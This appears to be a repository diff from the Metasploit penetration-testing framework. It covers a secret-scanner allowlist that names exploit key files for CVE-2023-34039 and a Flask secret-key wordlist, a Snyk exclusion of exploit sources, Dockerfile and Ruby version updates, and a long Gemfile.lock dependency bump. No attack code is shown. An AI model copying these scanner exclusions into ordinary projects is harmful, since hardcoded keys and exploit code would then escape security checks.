+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector:1
+58f9a39f72c623ab337a6768b34dc32f06d8ae67:documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md:60
+686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
+686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:65
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:93
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:7642
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8471
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8472
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/python_flask_cookie_signer.md:99
@@ -1,4 +1,5 @@
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
+adeherdt-r7 <adeherdt-r7@github>       Arne De Herdt <arne_deherdt@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
@@ -15,6 +16,8 @@ space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
+dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
+msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -119,6 +122,7 @@ m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
 Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
 Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
+mwalas-r7 <mwalas-r7@github>           <marcin_walas@rapid7.com>
 net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
@@ -183,4 +187,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.6
+  TargetRubyVersion: 2.7
  SuggestExtensions: false
  NewCops: disable

@@ -1 +1 @@
-3.0.5
+3.2.5
@@ -0,0 +1,9 @@
+version: v1.25.0
+ignore: {}
+patch: {}
+exclude:
+  global:
+    # exclude unit tests which contain hard coded passwords and encrypting keys for testing purposes.
+    - spec/
+    # exclude the source code to local exploits and utilities which have to be written in a particular way to exploit the vulnerabilities that we're targeting.
+    - external/source/
@@ -1,7 +1,8 @@
-FROM ruby:3.1.4-alpine3.18 AS builder
+FROM ruby:3.2.5-alpine3.20 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_FORCE_CLEAN="true"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV TOOLS_HOME=/usr/src/tools
 ENV BUNDLE_IGNORE_MESSAGES="true"
@@ -33,8 +34,11 @@ RUN apk add --no-cache \
      go \
    && echo "gem: --no-document" > /etc/gemrc \
    && gem update --system \
-    && bundle config $BUNDLER_ARGS \
+    && bundle config $BUNDLER_CONFIG_ARGS \
    && bundle install --jobs=8 \
+    && if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
+         bundle clean --force; \
+       fi \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -49,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.4-alpine3.18
+FROM ruby:3.2.5-alpine3.20
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -61,8 +65,8 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+RUN apk add --no-cache curl bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python3 py3-pip py3-impacket py3-requests ncurses libcap su-exec alpine-sdk \
    openssl-dev nasm
 RUN\
    if [ "${TARGETARCH}" = "arm64" ];\
@@ -70,7 +74,6 @@ RUN\
    else apk add --no-cache mingw-w64-gcc;\
    fi

-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

@@ -82,9 +85,6 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
-RUN pip install impacket
-RUN pip install requests

 ENV GOPATH=$TOOLS_HOME/go
 ENV GOROOT=$TOOLS_HOME/bin/go
@@ -1,7 +1,9 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.56)
+    metasploit-framework (6.4.52)
+      aarch64
+      abbrev
      actionpack (~> 7.0.0)
      activerecord (~> 7.0.0)
      activesupport (~> 7.0.0)
@@ -10,20 +12,30 @@ PATH
      aws-sdk-iam
      aws-sdk-s3
      aws-sdk-ssm
+      base64
      bcrypt
      bcrypt_pbkdf
+      benchmark
+      bigdecimal
      bootsnap
      bson
      chunky_png
+      concurrent-ruby (= 1.3.4)
+      csv
      dnsruby
+      drb
      ed25519
+      elftools
      em-http-request
      eventmachine
      faker
-      faraday
+      faraday (= 2.7.11)
      faraday-retry
      faye-websocket
+      ffi (< 1.17.0)
+      fiddle
      filesize
+      getoptlong
      hrr_rb_ssh-ed25519
      http-cookie
      irb (~> 1.7.4)
@@ -33,22 +45,25 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.165)
+      metasploit-payloads (= 2.0.189)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.26)
+      metasploit_payloads-mettle (= 1.0.35)
      mqtt
      msgpack (~> 1.6.0)
+      mutex_m
      nessus_rest
      net-imap
      net-ldap
+      net-sftp
      net-smtp
      net-ssh
      network_interface
      nexpose
-      nokogiri (~> 1.14.0)
+      nokogiri
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
+      ostruct
      packetfu
      patch_finder
      pcaprub
@@ -56,7 +71,7 @@ PATH
      pg
      puma
      railties
-      rasn1
+      rasn1 (= 0.13.0)
      rb-readline
      recog
      redcarpet
@@ -81,11 +96,11 @@ PATH
      rex-zip
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.0)
+      ruby_smb (~> 3.3.3)
      rubyntlm
      rubyzip
      sinatra
-      sqlite3
+      sqlite3 (= 1.7.3)
      sshkey
      swagger-blocks
      thin
@@ -103,128 +118,139 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.0)
-    actionpack (7.0.8)
-      actionview (= 7.0.8)
-      activesupport (= 7.0.8)
+    Ascii85 (1.1.1)
+    aarch64 (2.1.0)
+      racc (~> 1.6)
+    abbrev (0.1.2)
+    actionpack (7.0.8.6)
+      actionview (= 7.0.8.6)
+      activesupport (= 7.0.8.6)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8)
-      activesupport (= 7.0.8)
+    actionview (7.0.8.6)
+      activesupport (= 7.0.8.6)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8)
-      activesupport (= 7.0.8)
-    activerecord (7.0.8)
-      activemodel (= 7.0.8)
-      activesupport (= 7.0.8)
-    activesupport (7.0.8)
+    activemodel (7.0.8.6)
+      activesupport (= 7.0.8.6)
+    activerecord (7.0.8.6)
+      activemodel (= 7.0.8.6)
+      activesupport (= 7.0.8.6)
+    activesupport (7.0.8.6)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.5)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.23.0)
-      allure-ruby-commons (= 2.23.0)
+    allure-rspec (2.24.5)
+      allure-ruby-commons (= 2.24.5)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.23.0)
+    allure-ruby-commons (2.24.5)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
      uuid (>= 2.3, < 3)
-    arel-helpers (2.14.0)
+    arel-helpers (2.15.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
-    aws-eventstream (1.2.0)
-    aws-partitions (1.834.0)
-    aws-sdk-core (3.185.1)
-      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.651.0)
-      aws-sigv4 (~> 1.5)
+    aws-eventstream (1.3.0)
+    aws-partitions (1.999.0)
+    aws-sdk-core (3.211.0)
+      aws-eventstream (~> 1, >= 1.3.0)
+      aws-partitions (~> 1, >= 1.992.0)
+      aws-sigv4 (~> 1.9)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.411.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.34.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.87.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.72.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.136.0)
-      aws-sdk-core (~> 3, >= 3.181.0)
+    aws-sdk-ec2 (1.486.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-ec2instanceconnect (1.52.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-iam (1.112.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-kms (1.95.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-s3 (1.169.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.6)
-    aws-sdk-ssm (1.158.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
-      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.6.0)
+      aws-sigv4 (~> 1.5)
+    aws-sdk-ssm (1.183.0)
+      aws-sdk-core (~> 3, >= 3.210.0)
+      aws-sigv4 (~> 1.5)
+    aws-sigv4 (1.10.1)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.1.1)
-    bcrypt (3.1.19)
-    bcrypt_pbkdf (1.1.0)
+    base64 (0.2.0)
+    bcrypt (3.1.20)
+    bcrypt_pbkdf (1.1.1)
+    benchmark (0.4.0)
+    bigdecimal (3.1.8)
    bindata (2.4.15)
-    bootsnap (1.16.0)
+    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (4.15.0)
-    builder (3.2.4)
+    bson (5.0.1)
+    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.2)
-    cookiejar (0.3.3)
+    concurrent-ruby (1.3.4)
+    cookiejar (0.3.4)
    crass (1.0.6)
+    csv (3.3.0)
    daemons (1.4.1)
-    date (3.3.3)
+    date (3.4.1)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
-    diff-lcs (1.5.0)
-    dnsruby (1.70.0)
+    diff-lcs (1.5.1)
+    dnsruby (1.72.2)
      simpleidn (~> 0.2.1)
-    docile (1.4.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    docile (1.4.1)
+    domain_name (0.6.20240107)
+    drb (2.2.1)
    ed25519 (1.3.0)
+    elftools (1.3.1)
+      bindata (~> 2)
    em-http-request (1.1.7)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
      eventmachine (>= 1.0.3)
      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.2)
+    em-socksify (0.3.3)
+      base64
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.12.0)
+    erubi (1.13.0)
    eventmachine (1.2.7)
-    factory_bot (6.2.1)
+    factory_bot (6.5.0)
      activesupport (>= 5.0.0)
-    factory_bot_rails (6.2.0)
-      factory_bot (~> 6.2.0)
+    factory_bot_rails (6.4.4)
+      factory_bot (~> 6.5)
      railties (>= 5.0.0)
-    faker (3.2.1)
+    faker (3.5.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.2.0)
+    faraday-retry (2.2.1)
      faraday (~> 2.0)
    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
+    getoptlong (0.2.1)
    gssapi (1.3.1)
      ffi (>= 1.0.1)
    gyoku (1.4.0)
@@ -235,37 +261,38 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.5)
+    http-cookie (1.0.7)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.14.1)
+    i18n (1.14.6)
      concurrent-ruby (~> 1.0)
-    io-console (0.6.0)
+    io-console (0.7.2)
    irb (1.7.4)
      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.6.3)
+    json (2.7.5)
    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
-    logging (2.3.1)
+    logger (1.6.1)
+    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.21.3)
+    loofah (2.23.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
    macaddr (1.7.2)
      systemu (~> 2.6.5)
-    memory_profiler (1.0.1)
+    memory_profiler (1.1.0)
    metasm (1.0.5)
-    metasploit-concern (5.0.2)
+    metasploit-concern (5.0.3)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.7)
+    metasploit-credential (6.0.11)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -279,8 +306,8 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.165)
-    metasploit_data_models (6.0.3)
+    metasploit-payloads (2.0.189)
+    metasploit_data_models (6.0.6)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -290,68 +317,75 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.26)
-    method_source (1.0.0)
-    mime-types (3.5.1)
+    metasploit_payloads-mettle (1.0.35)
+    method_source (1.1.0)
+    mime-types (3.6.0)
+      logger
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.1003)
-    mini_portile2 (2.8.4)
-    minitest (5.20.0)
+    mime-types-data (3.2024.1001)
+    mini_portile2 (2.8.8)
+    minitest (5.25.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
-    mustermann (3.0.0)
+    mustermann (3.0.3)
      ruby2_keywords (~> 0.0.1)
+    mutex_m (0.2.0)
    nessus_rest (0.1.6)
-    net-imap (0.4.0)
+    net-imap (0.5.0)
      date
      net-protocol
-    net-ldap (0.18.0)
-    net-protocol (0.2.1)
+    net-ldap (0.19.0)
+    net-protocol (0.2.2)
      timeout
-    net-smtp (0.4.0)
+    net-sftp (4.0.0)
+      net-ssh (>= 5.0.0, < 8.0.0)
+    net-smtp (0.5.0)
      net-protocol
-    net-ssh (7.2.0)
+    net-ssh (7.3.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.5.9)
-    nokogiri (1.14.5)
-      mini_portile2 (~> 2.8.0)
+    nio4r (2.7.4)
+    nokogiri (1.18.2)
+      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
-    nori (2.6.0)
+    nori (2.7.1)
+      bigdecimal
    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.23.0)
-    parser (3.2.2.4)
+    parallel (1.26.3)
+    parser (3.3.5.0)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
-    pcaprub (0.13.1)
-    pdf-reader (2.11.0)
+    pcaprub (0.13.3)
+    pdf-reader (2.12.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.4)
+    pg (1.5.9)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.3)
-    puma (6.4.0)
+    public_suffix (6.0.1)
+    puma (6.4.3)
      nio4r (~> 2.0)
-    racc (1.7.1)
-    rack (2.2.8)
-    rack-protection (3.1.0)
+    racc (1.8.1)
+    rack (2.2.10)
+    rack-protection (3.2.0)
+      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
    rack-test (2.1.0)
      rack (>= 1.3)
@@ -362,26 +396,26 @@ GEM
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.8)
-      actionpack (= 7.0.8)
-      activesupport (= 7.0.8)
+    railties (7.0.8.6)
+      actionpack (= 7.0.8.6)
+      activesupport (= 7.0.8.6)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
      zeitwerk (~> 2.5)
    rainbow (3.1.1)
-    rake (13.0.6)
-    rasn1 (0.12.1)
+    rake (13.2.1)
+    rasn1 (0.13.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.2)
+    recog (3.1.11)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.8.1)
-    reline (0.4.1)
+    regexp_parser (2.9.2)
+    reline (0.5.10)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.15)
+    rex-arch (0.1.16)
      rex-text
    rex-bin_tools (0.1.9)
      metasm
@@ -389,12 +423,12 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.31)
+    rex-core (0.1.32)
    rex-encoder (0.1.7)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.39)
+    rex-exploitation (0.1.40)
      jsobfu
      metasm
      rex-arch
@@ -408,79 +442,79 @@ GEM
      rex-arch
    rex-ole (0.1.8)
      rex-text
-    rex-powershell (0.1.99)
+    rex-powershell (0.1.100)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.11)
+    rex-random_identifier (0.1.13)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.56)
+    rex-socket (0.1.58)
+      dnsruby
      rex-core
    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.4)
-    rex-text (0.2.53)
+    rex-text (0.2.59)
    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.6)
+    rexml (3.3.9)
    rkelly-remix (0.0.7)
-    rspec (3.12.0)
-      rspec-core (~> 3.12.0)
-      rspec-expectations (~> 3.12.0)
-      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.2)
-      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.3)
+    rspec (3.13.0)
+      rspec-core (~> 3.13.0)
+      rspec-expectations (~> 3.13.0)
+      rspec-mocks (~> 3.13.0)
+    rspec-core (3.13.2)
+      rspec-support (~> 3.13.0)
+    rspec-expectations (3.13.3)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.6)
+      rspec-support (~> 3.13.0)
+    rspec-mocks (3.13.2)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-rails (6.0.3)
-      actionpack (>= 6.1)
-      activesupport (>= 6.1)
-      railties (>= 6.1)
-      rspec-core (~> 3.12)
-      rspec-expectations (~> 3.12)
-      rspec-mocks (~> 3.12)
-      rspec-support (~> 3.12)
+      rspec-support (~> 3.13.0)
+    rspec-rails (7.0.1)
+      actionpack (>= 7.0)
+      activesupport (>= 7.0)
+      railties (>= 7.0)
+      rspec-core (~> 3.13)
+      rspec-expectations (~> 3.13)
+      rspec-mocks (~> 3.13)
+      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.12.1)
-    rubocop (1.56.4)
-      base64 (~> 0.1.1)
+    rspec-support (3.13.1)
+    rubocop (1.67.0)
      json (~> 2.3)
      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.2.2.3)
+      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.1, < 2.0)
+      regexp_parser (>= 2.4, < 3.0)
+      rubocop-ast (>= 1.32.2, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.29.0)
-      parser (>= 3.2.1.0)
-    ruby-macho (4.0.0)
+    rubocop-ast (1.33.0)
+      parser (>= 3.3.1.0)
+    ruby-macho (4.1.0)
    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.2)
-      bindata
+    ruby_smb (3.3.13)
+      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
-      rubyntlm
+      rubyntlm (>= 0.6.5)
      windows_error (>= 0.1.4)
-    rubyntlm (0.6.3)
+    rubyntlm (0.6.5)
+      base64
    rubyzip (2.3.2)
    sawyer (0.9.2)
      addressable (>= 2.3.5)
@@ -488,65 +522,63 @@ GEM
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
-    simplecov-html (0.12.3)
-    simpleidn (0.2.1)
-      unf (~> 0.1.4)
-    sinatra (3.1.0)
+    simplecov-html (0.13.1)
+    simpleidn (0.2.3)
+    sinatra (3.2.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.1.0)
+      rack-protection (= 3.2.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.6)
+    sqlite3 (1.7.3)
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
    systemu (2.6.5)
-    test-prof (1.2.3)
+    test-prof (1.4.2)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.2.2)
-    tilt (2.3.0)
-    timecop (0.9.8)
-    timeout (0.4.0)
-    ttfunk (1.7.0)
+    thor (1.3.2)
+    tilt (2.4.0)
+    timecop (0.9.10)
+    timeout (0.4.1)
+    ttfunk (1.8.0)
+      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2023.3)
+    tzinfo-data (1.2024.2)
      tzinfo (>= 1.0.0)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
-    unicode-display_width (2.5.0)
+    unicode-display_width (2.6.0)
    unix-crypt (1.3.1)
    uuid (2.3.9)
      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.8.1)
+    webrick (1.8.2)
    websocket-driver (0.7.6)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
    windows_error (0.1.5)
-    winrm (2.3.6)
+    winrm (2.3.9)
      builder (>= 2.1.2)
      erubi (~> 1.8)
      gssapi (~> 1.2)
      gyoku (~> 1.0)
      httpclient (~> 2.2, >= 2.2.0.2)
      logging (>= 1.6.1, < 3.0)
-      nori (~> 2.0)
+      nori (~> 2.0, >= 2.7.1)
+      rexml (~> 3.0)
      rubyntlm (~> 0.6.0, >= 0.6.3)
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.3)
      webrick
-    yard (0.9.34)
-    zeitwerk (2.6.12)
+    yard (0.9.37)
+    zeitwerk (2.6.18)

 PLATFORMS
  ruby
@@ -572,4 +604,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   2.1.4
+   2.5.10
@@ -1,211 +1,222 @@
